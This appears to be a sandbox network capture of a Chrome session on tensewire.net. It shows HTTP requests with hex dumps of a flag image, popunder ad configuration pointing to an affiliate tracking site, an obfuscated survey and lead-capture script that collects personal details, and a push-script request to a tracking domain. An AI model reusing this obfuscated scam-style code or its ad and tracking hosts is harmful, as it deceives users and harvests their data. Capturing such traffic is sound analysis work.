                              2024-04-25 18:22:14 UTC949INData Raw: 3a 09 ad 15 b6 2b 77 00 71 4b 0a e5 cf cf 03 f7 13 41 71 94 83 d0 21 74 10 98 d0 13 d9 4f bc 47 bc 44 fc 8e c8 20 ee e1 71 5a 54 65 ba 72 54 5d 79 8b 9b de 9d df 94 db f5 7d 4b ea 57 af 52 a6 41 e8 57 d2 d5 b2 81 f2 98 c3 0d 64 d2 9e 38 2f f0 a6 1a 5d ff b5 88 f2 bc 91 4f 73 23 1f 05 6b 4b bc c8 3b 79 25 95 bd 83 87 a2 83 d0 21 74 08 dd 2c df f2 06 da bd 09 7c ce 7f 66 5b dd 5e 88 6f 34 86 d0 b3 a7 bd 65 0d da db 41 8c 15 2d 88 eb 3c f3 bd e0 32 8e f3 58 74 10 3a 84 0e a1 03 47 79 4a 20 f4 9c e9 12 81 37 f5 96 18 0c ae 78 d7 80 e8 20 74 08 1d 42 07 c9 b2 36 73 fd 41 e8 57 a7 ad 65 8d eb 24 ab 52 63 15 ce ab 04 4d f3 96 21 d1 41 e8 10 3a 84 0e 92 dd 08 57 0c 42 4f 8d 87 2c 6b e4 8e 0e 62 ac 25 f0 bb b4 64 e6 1b 14 1d 84 0e a1 43 e8 20 19 ae b8 d1 11 42 4f
                              Data Ascii: :+wqKAq!tOGD qZTerT]y}KWRAWd8/]Os#kK;y%!t,|f[^o4eA-<2Xt:GyJ 7x tB6sAWe$RcM!A:WBO,kb%dC BO


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.449766104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC420OUTGET /assets/images/flags/flag-us.png HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC829INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:14 GMT
                              Content-Type: image/png
                              Content-Length: 2692
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Tue, 30 Apr 2024 10:24:24 GMT
                              last-modified: Tue, 12 Sep 2023 17:39:54 GMT
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              vary: User-Agent,User-Agent
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: HIT
                              Age: 201470
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bT4DXnHAAcwG8qtJc7CaXqlAx1TnB3%2FnxysAH1eNWiydECbkn3bkooaHa%2BcZfCJs3sQ2GTmaB0BVBr2mEHZnNo1zzwkqNCH53X%2Fc%2BH9QLToU0OVyGZGnuxTjyRTLd8Cp"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7d4bc64511-ATL
                              2024-04-25 18:22:14 UTC540INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 00 1e 3f 88 b1 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 0a 36 49 44 41 54 68 81 cd 5a 7b 70 15 d5 19 ff 7d 7b f7 3e f2 00 ee 0d 79 48 80 80 18 02 83 a2 20 01 1f d0 94 19 45 2b 23 c5 5a 8c 6d 41 5b 51 6b 19 c6 3f ea a3 f5 51 5b 67 b0 53 98 4e 69 67 d0 a2 33 06 46 45 a6 58 c0 41 2c 33 34 b4 42 10 14 90 a8 10 30 84 18 f3 84 10 2e b9 9b 90 dc f7 dd af 7f ec ee bd bb 7b f7 be 02 3a fd 66 ee ec 39 df f9 9d ef 75 be 3d e7 db 93 10 ae 02 dd fd f2 21 34 9f f3 57 79 2f 47 16 c6 64 cc 89 c9 3c 03 40 05 80 52 99 d9 75 e9 cd 05 51 00 7e 00 fd 00 da 99 b9 19 c0 31 22 6a 60 e6 56 8f c7 73 c5 36 d0 95 4c ae 78 bc be ea e2 e5 c8 23 d1 18 2f 8b c4 b8 72 bc c7 81
                              Data Ascii: PNGIHDR22?pHYs+6IDAThZ{p}{>yH E+#ZmA[Qk?Q[gSNig3FEXA,34B0.{:f9u=!4Wy/Gd<@RuQ~1"j`Vs6Lx#/r
                              2024-04-25 18:22:14 UTC1369INData Raw: 74 83 15 bf ac 77 0f 06 a2 bb 06 03 b1 9a f7 3e ed c3 f2 f9 65 28 70 da 14 47 74 31 b8 b6 d4 85 a1 40 0c 3b 8e 7a f1 b3 f9 a5 70 3a 04 c5 11 00 00 61 f8 f5 6d 69 22 c6 71 5c 0a 5a 09 97 b3 b2 65 e2 f7 97 56 75 1d 90 52 81 52 ce ae 5a fd 1f 77 fb c5 60 fd 3d b3 8a aa bf 68 1f 42 87 37 84 9b 26 15 60 4c be 88 86 af 06 0c d8 fb e7 15 e3 68 eb 65 74 f7 87 50 3d 65 14 1c 22 e1 70 cb 60 7c fc ab 9d 4f 1b 0c 27 90 b6 0f a8 6e 24 56 17 06 be 6e 8e d3 f9 99 38 6d f2 a2 ca 13 bb 2d 9d b1 74 64 ee 33 07 5c 5f 74 0c ed 8d c4 b8 46 d3 e3 b4 13 42 51 d6 e4 5a ce 74 8a 3a 8c 8e 9a 77 3e 15 37 4f 99 aa 4d d6 63 f5 e6 eb c7 75 7c 87 a3 c1 3e e7 fa bb af fb 64 5b 52 9a 25 ed 5a ab 36 36 a2 a9 7b 78 63 24 2a d7 28 02 18 20 e0 37 3f ac 48 08 24 95 cf ea 0f 0c 02 f0 ec 92 8a
                              Data Ascii: tw>e(pGt1@;zp:ami"q\ZeVuRRZw`=hB7&`LhetP=e"p`|O'n$Vn8m-td3\_tFBQZt:w>7OMcu|>d[R%Z66{xc$*( 7?H$
                              2024-04-25 18:22:14 UTC783INData Raw: 22 ea 07 8c 45 99 fe a7 91 99 6f 85 d7 f7 f5 32 f5 32 ac 74 a5 d2 6f 96 91 ca 46 22 ea 17 99 b9 1d c0 64 ab b2 61 24 11 4b 55 5e e8 fb e9 4a 94 6c e4 59 d8 d2 2e 00 68 4e e1 65 ca c8 e5 3a 6e 85 c9 34 2f 17 2c 80 66 01 40 fc f6 2c 55 c4 ac 2a 54 73 a5 6a 8e a2 55 f5 9a e9 dd 48 27 3b 83 8e 63 62 e4 58 d3 c7 e1 83 c7 91 dd 19 fb ff 48 04 c7 f7 e6 7c 2c 06 df df d7 e2 af db d1 8a 70 b8 32 71 56 1a f7 6c a8 67 31 43 3b 88 94 96 1e a5 70 49 77 ea 42 c5 70 5c 02 74 32 34 0c 9b 34 90 4e 1a 92 64 58 e8 70 38 5a f3 bd be 16 25 c1 f2 6e fc 13 07 82 cf 65 1b 81 74 ab 97 7e 34 5b 4c f6 3a 28 cf b5 76 7a e0 c4 f3 02 00 08 c5 9e cd 04 92 75 5f 44 e6 12 c0 20 c4 dc 32 16 1c e6 3a 37 15 9e 4c 3a ac 25 a7 ae 38 00 02 c9 42 b1 67 b3 01 d5 ec 9c b9 9b 43 a1 7b 2d ad 4f 12
                              Data Ascii: "Eo22toF"da$KU^JlY.hNe:n4/,f@,U*TsjUH';cbXH|,p2qVlg1C;pIwBp\t244NdXp8Z%net~4[L:(vzu_D 2:7L:%8BgC{-O


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.449767104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:14 UTC741OUTPOST / HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              Content-Length: 41
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                              X-Requested-With: XMLHttpRequest
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Origin: https://tensewire.net
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:14 UTC41OUTData Raw: 5f 74 79 70 65 3d 61 6a 61 78 26 5f 61 63 74 69 6f 6e 3d 6d 61 73 74 65 72 2d 67 65 74 50 6f 70 75 6e 64 65 72 44 61 74 61
                              Data Ascii: _type=ajax&_action=master-getPopunderData
                              2024-04-25 18:22:15 UTC822INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              pragma: no-cache
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2FkdzytKMJjgSzLiGieo5PrX2natQmkrXUqc8eYiZNL11W45YzkCg4Kw%2FWeUXmHoQLT%2Boi2gHlsZWwO5GhPGyBRQ9dIe35sXW%2FM9qKT0Q%2BxPIlqa4arE3k85YnY1VN7Z"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b7fbdd88832-ATL
                              2024-04-25 18:22:15 UTC342INData Raw: 31 34 66 0d 0a 7b 22 64 79 6e 61 6d 69 63 22 3a 7b 22 31 30 22 3a 31 7d 2c 22 75 72 6c 73 22 3a 7b 22 31 30 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 74 72 69 63 6b 61 72 70 2e 73 69 74 65 3f 26 73 31 3d 78 78 61 67 65 6e 74 69 64 78 78 26 73 32 3d 6a 6a 68 69 74 6a 6a 26 73 33 3d 37 30 39 30 26 73 34 3d 31 26 73 38 3d 34 35 35 30 26 6f 77 3d 30 26 73 31 30 3d 32 33 38 36 22 7d 2c 22 68 69 74 73 69 64 5f 70 6f 70 75 6e 64 65 72 22 3a 7b 22 31 30 22 3a 22 35 32 33 39 22 7d 2c 22 70 6f 70 75 6e 64 65 72 5f 6d 6f 64 65 22 3a 5b 7b 22 69 64 22 3a 22 32 39 37 39 22 2c 22 69 64 5f 63 61 6d 70 61 69 67 6e 22 3a 22 34 35 35 30 22 2c 22 69 64 5f 70 6f 70 75 6e 64 65 72 22 3a 22 31 30 22 2c 22 74 79 70 65 22 3a 22 32 22 2c 22 72 65 66 72 65 73 68 5f 69 64 22 3a 22 31
                              Data Ascii: 14f{"dynamic":{"10":1},"urls":{"10":"https://metrickarp.site?&s1=xxagentidxx&s2=jjhitjj&s3=7090&s4=1&s8=4550&ow=0&s10=2386"},"hitsid_popunder":{"10":"5239"},"popunder_mode":[{"id":"2979","id_campaign":"4550","id_popunder":"10","type":"2","refresh_id":"1
                              2024-04-25 18:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.449768104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:15 UTC668OUTGET /assets/js/dublin/dist/common-hybrid.js?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:15 UTC832INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:15 GMT
                              Content-Type: application/javascript
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Thu, 02 May 2024 18:22:15 GMT
                              last-modified: Fri, 05 Apr 2024 15:34:13 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: MISS
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2s69R5%2F%2FK3GGAuTDeBLkKBazekPUrguLKJswj5mSShBKl4VedGS2VSixryAvrisjg%2FgfuR%2FaZiScLPJwSfW3HOC%2F96vHKx8cOWGqBAdnymV4dU4UOl48xeUlFuikwIfz"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b81084953f6-ATL
                              2024-04-25 18:22:15 UTC537INData Raw: 37 62 62 64 0d 0a 76 61 72 20 61 30 5f 30 78 33 39 62 37 63 65 3d 61 30 5f 30 78 32 31 62 65 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 63 35 35 62 32 2c 5f 30 78 35 34 61 37 37 31 29 7b 76 61 72 20 5f 30 78 35 38 65 62 31 35 3d 61 30 5f 30 78 32 31 62 65 2c 5f 30 78 35 63 39 35 64 37 3d 5f 30 78 32 63 35 35 62 32 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 64 30 62 36 64 65 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 65 62 31 35 28 30 78 32 65 66 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 65 62 31 35 28 30 78 33 30 65 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 65 62 31 35 28 30 78 31 63 31 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 65 62 31
                              Data Ascii: 7bbdvar a0_0x39b7ce=a0_0x21be;(function(_0x2c55b2,_0x54a771){var _0x58eb15=a0_0x21be,_0x5c95d7=_0x2c55b2();while(!![]){try{var _0xd0b6de=-parseInt(_0x58eb15(0x2ef))/0x1*(-parseInt(_0x58eb15(0x30e))/0x2)+-parseInt(_0x58eb15(0x1c1))/0x3*(parseInt(_0x58eb1
                              2024-04-25 18:22:15 UTC1369INData Raw: 64 37 5b 27 70 75 73 68 27 5d 28 5f 30 78 35 63 39 35 64 37 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 35 31 66 66 66 29 7b 5f 30 78 35 63 39 35 64 37 5b 27 70 75 73 68 27 5d 28 5f 30 78 35 63 39 35 64 37 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 30 5f 30 78 34 33 31 37 2c 30 78 65 32 66 65 35 29 29 3b 6c 65 74 20 24 63 75 72 72 2c 64 61 74 61 3d 7b 7d 2c 73 75 72 76 65 79 69 64 3d 27 27 3b 76 61 72 20 61 74 74 72 43 68 6f 69 63 65 73 3d 24 28 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 31 62 66 29 29 5b 27 61 74 74 72 27 5d 28 27 73 69 64 27 29 2c 64 6f 6d 61 69 6e 3d 27 65 78 63 69 74 65 2e 6f 73 72 61 6d 6c 75 6d 65 6e 73 2e 63 6f 6d 27 2c 63 6f 75 6e 74 3d 30 78 30 2c 70 69 70 65 6c 69 6e 65 3d 27 73 61 75 2e 62
                              Data Ascii: d7['push'](_0x5c95d7['shift']());}catch(_0x151fff){_0x5c95d7['push'](_0x5c95d7['shift']());}}}(a0_0x4317,0xe2fe5));let $curr,data={},surveyid='';var attrChoices=$(a0_0x39b7ce(0x1bf))['attr']('sid'),domain='excite.osramlumens.com',count=0x0,pipeline='sau.b
                              2024-04-25 18:22:15 UTC1369INData Raw: 29 2c 27 50 41 27 3a 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 31 35 63 29 2c 27 52 49 27 3a 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 32 35 33 29 2c 27 53 43 27 3a 27 53 6f 75 74 68 5c 78 32 30 43 61 72 6f 6c 69 6e 61 27 2c 27 53 44 27 3a 27 53 6f 75 74 68 5c 78 32 30 44 61 6b 6f 74 61 27 2c 27 54 4e 27 3a 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 31 63 35 29 2c 27 54 58 27 3a 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 31 30 38 29 2c 27 55 54 27 3a 27 55 74 61 68 27 2c 27 56 54 27 3a 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 31 33 37 29 2c 27 56 41 27 3a 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 31 35 66 29 2c 27 57 41 27 3a 27 57 61 73 68 69 6e 67 74 6f 6e 27 2c 27 57 56 27 3a 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 65 34 29 2c 27 57 49 27 3a 61 30 5f
                              Data Ascii: ),'PA':a0_0x39b7ce(0x15c),'RI':a0_0x39b7ce(0x253),'SC':'South\x20Carolina','SD':'South\x20Dakota','TN':a0_0x39b7ce(0x1c5),'TX':a0_0x39b7ce(0x108),'UT':'Utah','VT':a0_0x39b7ce(0x137),'VA':a0_0x39b7ce(0x15f),'WA':'Washington','WV':a0_0x39b7ce(0xe4),'WI':a0_
                              2024-04-25 18:22:15 UTC1369INData Raw: 78 32 39 36 62 64 36 28 30 78 32 35 35 29 29 5b 5f 30 78 32 39 36 62 64 36 28 30 78 31 66 39 29 5d 28 5f 30 78 35 37 30 66 37 32 5b 5f 30 78 34 35 63 33 30 5d 29 3a 24 28 5f 30 78 32 39 36 62 64 36 28 30 78 31 65 38 29 29 5b 5f 30 78 32 39 36 62 64 36 28 30 78 32 32 36 29 5d 28 5f 30 78 32 39 36 62 64 36 28 30 78 31 39 33 29 2b 5f 30 78 35 37 30 66 37 32 5b 5f 30 78 34 35 63 33 30 5d 2b 27 5c 78 32 32 3e 27 2b 5f 30 78 35 37 30 66 37 32 5b 5f 30 78 34 35 63 33 30 5d 2b 27 3c 2f 6f 70 74 69 6f 6e 3e 27 29 3b 7d 66 6f 72 28 76 61 72 20 5f 30 78 34 35 37 34 33 37 3d 30 78 30 3b 5f 30 78 34 35 37 34 33 37 3c 5f 30 78 33 64 38 39 38 64 5b 5f 30 78 32 39 36 62 64 36 28 30 78 32 30 34 29 5d 3b 5f 30 78 34 35 37 34 33 37 2b 2b 29 7b 24 28 5f 30 78 32 39 36 62 64
                              Data Ascii: x296bd6(0x255))[_0x296bd6(0x1f9)](_0x570f72[_0x45c30]):$(_0x296bd6(0x1e8))[_0x296bd6(0x226)](_0x296bd6(0x193)+_0x570f72[_0x45c30]+'\x22>'+_0x570f72[_0x45c30]+'</option>');}for(var _0x457437=0x0;_0x457437<_0x3d898d[_0x296bd6(0x204)];_0x457437++){$(_0x296bd
                              2024-04-25 18:22:15 UTC1369INData Raw: 66 34 29 2c 24 28 5f 30 78 33 63 38 30 38 62 28 30 78 32 36 62 29 29 5b 5f 30 78 33 63 38 30 38 62 28 30 78 32 36 61 29 5d 28 7b 27 77 69 64 74 68 27 3a 27 30 25 27 7d 29 2c 24 28 5f 30 78 33 63 38 30 38 62 28 30 78 31 36 32 29 29 5b 27 63 73 73 27 5d 28 7b 27 77 69 64 74 68 27 3a 5f 30 78 33 63 38 30 38 62 28 30 78 31 64 62 29 7d 29 2c 63 6f 75 6e 74 5f 70 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 36 30 37 34 64 38 3d 5f 30 78 33 63 38 30 38 62 3b 24 28 5f 30 78 36 30 37 34 64 38 28 30 78 33 32 37 29 29 5b 5f 30 78 36 30 37 34 64 38 28 30 78 32 38 34 29 5d 28 5f 30 78 36 30 37 34 64 38 28 30 78 31 34 35 29 29 5b 5f 30 78 36 30 37 34 64 38 28 30 78 31 34 61 29 5d 28 5f 30 78 36 30 37 34 64 38 28 30 78
                              Data Ascii: f4),$(_0x3c808b(0x26b))[_0x3c808b(0x26a)]({'width':'0%'}),$(_0x3c808b(0x162))['css']({'width':_0x3c808b(0x1db)}),count_p(),setTimeout(function(){var _0x6074d8=_0x3c808b;$(_0x6074d8(0x327))[_0x6074d8(0x284)](_0x6074d8(0x145))[_0x6074d8(0x14a)](_0x6074d8(0x
                              2024-04-25 18:22:15 UTC1369INData Raw: 28 29 3b 7d 2c 30 78 32 31 33 34 29 2c 24 28 5f 30 78 33 63 38 30 38 62 28 30 78 32 30 31 29 29 5b 5f 30 78 33 63 38 30 38 62 28 30 78 32 31 61 29 5d 28 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 51 75 65 73 74 69 6f 6e 28 5f 30 78 31 38 37 34 62 39 2c 5f 30 78 34 38 39 33 61 64 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 32 36 34 37 36 37 3d 61 30 5f 30 78 32 31 62 65 3b 24 28 27 2e 70 72 6f 67 72 65 73 73 27 29 5b 5f 30 78 32 36 34 37 36 37 28 30 78 32 36 61 29 5d 28 7b 27 64 69 73 70 6c 61 79 27 3a 5f 30 78 32 36 34 37 36 37 28 30 78 31 65 36 29 7d 29 2c 24 28 27 23 71 75 65 73 74 69 6f 6e 54 65 78 74 27 29 5b 5f 30 78 32 36 34 37 36 37 28 30 78 31 38 64 29 5d 28 5f 30 78 32 36 34 37 36 37 28
                              Data Ascii: ();},0x2134),$(_0x3c808b(0x201))[_0x3c808b(0x21a)]();}function createQuestion(_0x1874b9,_0x4893ad){setTimeout(function(){var _0x264767=a0_0x21be;$('.progress')[_0x264767(0x26a)]({'display':_0x264767(0x1e6)}),$('#questionText')[_0x264767(0x18d)](_0x264767(
                              2024-04-25 18:22:15 UTC1369INData Raw: 66 2c 5f 30 78 32 30 36 61 61 65 2c 5f 30 78 31 36 63 31 61 63 2c 5f 30 78 33 36 39 34 32 38 2c 5f 30 78 31 35 64 34 35 65 3d 27 27 2c 5f 30 78 32 66 64 37 33 37 3d 27 27 29 7b 76 61 72 20 5f 30 78 37 34 34 32 30 30 3d 61 30 5f 30 78 33 39 62 37 63 65 3b 24 28 5f 30 78 37 34 34 32 30 30 28 30 78 31 35 31 29 29 5b 5f 30 78 37 34 34 32 30 30 28 30 78 31 66 38 29 5d 28 5f 30 78 37 34 34 32 30 30 28 30 78 31 62 38 29 29 2c 24 28 5f 30 78 37 34 34 32 30 30 28 30 78 31 35 65 29 29 5b 5f 30 78 37 34 34 32 30 30 28 30 78 32 36 61 29 5d 28 7b 27 6d 69 6e 2d 68 65 69 67 68 74 27 3a 5f 30 78 37 34 34 32 30 30 28 30 78 32 35 63 29 7d 29 2c 70 72 6f 63 65 73 73 69 6e 67 3d 21 21 5b 5d 3b 6c 65 74 20 5f 30 78 33 38 31 34 65 61 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 28
                              Data Ascii: f,_0x206aae,_0x16c1ac,_0x369428,_0x15d45e='',_0x2fd737=''){var _0x744200=a0_0x39b7ce;$(_0x744200(0x151))[_0x744200(0x1f8)](_0x744200(0x1b8)),$(_0x744200(0x15e))[_0x744200(0x26a)]({'min-height':_0x744200(0x25c)}),processing=!![];let _0x3814ea=new FormData(
                              2024-04-25 18:22:15 UTC1369INData Raw: 28 29 2c 70 72 6f 67 72 65 73 73 3d 30 78 36 34 2c 24 28 5f 30 78 34 36 66 34 34 64 28 30 78 32 37 35 29 29 5b 5f 30 78 34 36 66 34 34 64 28 30 78 32 36 61 29 5d 28 27 77 69 64 74 68 27 2c 70 72 6f 67 72 65 73 73 2b 27 25 27 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 35 35 31 37 62 61 3d 5f 30 78 34 36 66 34 34 64 3b 24 28 5f 30 78 35 35 31 37 62 61 28 30 78 32 37 35 29 29 5b 5f 30 78 35 35 31 37 62 61 28 30 78 31 34 61 29 5d 28 5f 30 78 35 35 31 37 62 61 28 30 78 32 63 33 29 29 2c 24 28 5f 30 78 35 35 31 37 62 61 28 30 78 31 62 31 29 29 5b 5f 30 78 35 35 31 37 62 61 28 30 78 65 66 29 5d 28 29 3b 7d 2c 30 78 33 65 38 29 2c 63 68 65 65 72 73 28 70 72 6f 67 72 65 73 73 29 2c 24 28 5f 30 78 34 36 66 34 34 64
                              Data Ascii: (),progress=0x64,$(_0x46f44d(0x275))[_0x46f44d(0x26a)]('width',progress+'%'),setTimeout(function(){var _0x5517ba=_0x46f44d;$(_0x5517ba(0x275))[_0x5517ba(0x14a)](_0x5517ba(0x2c3)),$(_0x5517ba(0x1b1))[_0x5517ba(0xef)]();},0x3e8),cheers(progress),$(_0x46f44d
                              2024-04-25 18:22:15 UTC1369INData Raw: 29 29 5b 27 6d 6f 64 61 6c 27 5d 28 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 32 31 61 29 29 2c 24 63 75 72 72 3d 24 28 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 32 32 34 29 29 2c 24 28 61 30 5f 30 78 33 39 62 37 63 65 28 30 78 32 31 62 29 29 5b 27 63 6c 69 63 6b 27 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 62 62 30 63 64 3d 61 30 5f 30 78 33 39 62 37 63 65 2c 5f 30 78 34 32 63 39 32 37 3d 24 28 74 68 69 73 29 5b 5f 30 78 34 62 62 30 63 64 28 30 78 33 31 66 29 5d 28 27 69 64 27 29 3b 5f 30 78 34 32 63 39 32 37 3d 72 65 70 6c 61 63 65 55 72 6c 50 61 72 61 6d 28 5f 30 78 34 32 63 39 32 37 2c 27 73 31 27 2c 61 66 66 5f 69 64 29 2c 5f 30 78 34 32 63 39 32 37 3d 72 65 70 6c 61 63 65 55 72 6c 50 61 72 61 6d 28 5f 30 78 34 32 63 39 32 37 2c
                              Data Ascii: ))['modal'](a0_0x39b7ce(0x21a)),$curr=$(a0_0x39b7ce(0x224)),$(a0_0x39b7ce(0x21b))['click'](function(){var _0x4bb0cd=a0_0x39b7ce,_0x42c927=$(this)[_0x4bb0cd(0x31f)]('id');_0x42c927=replaceUrlParam(_0x42c927,'s1',aff_id),_0x42c927=replaceUrlParam(_0x42c927,
                              2024-04-25 18:22:15 UTC1369INData Raw: 6c 69 63 79 2d 63 6c 6f 73 65 27 2c 27 2e 71 75 65 73 74 69 6f 6e 27 2c 27 23 6c 6e 61 6d 65 2d 64 61 74 61 55 27 2c 27 5c 78 32 32 3e 5c 78 30 61 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 5c 78 30 39 3c 62 75 74 74 6f 6e 5c 78 32 30 69 64 3d 5c 78 32 32 7a 69 70 2d 64 61 74 61 2d 62 74 6e 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 5c 78 32 30 74
                              Data Ascii: licy-close','.question','#lname-dataU','\x22>\x0a\x09\x09\x09\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09\x09\x09<button\x20id=\x22zip-data-btn\x22\x20style=\x22vertical-align:\x20t


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.449769104.21.80.1044435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:15 UTC536OUTGET /scripts/push/v9e118mez8 HTTP/1.1
                              Host: trk-adulvion.com
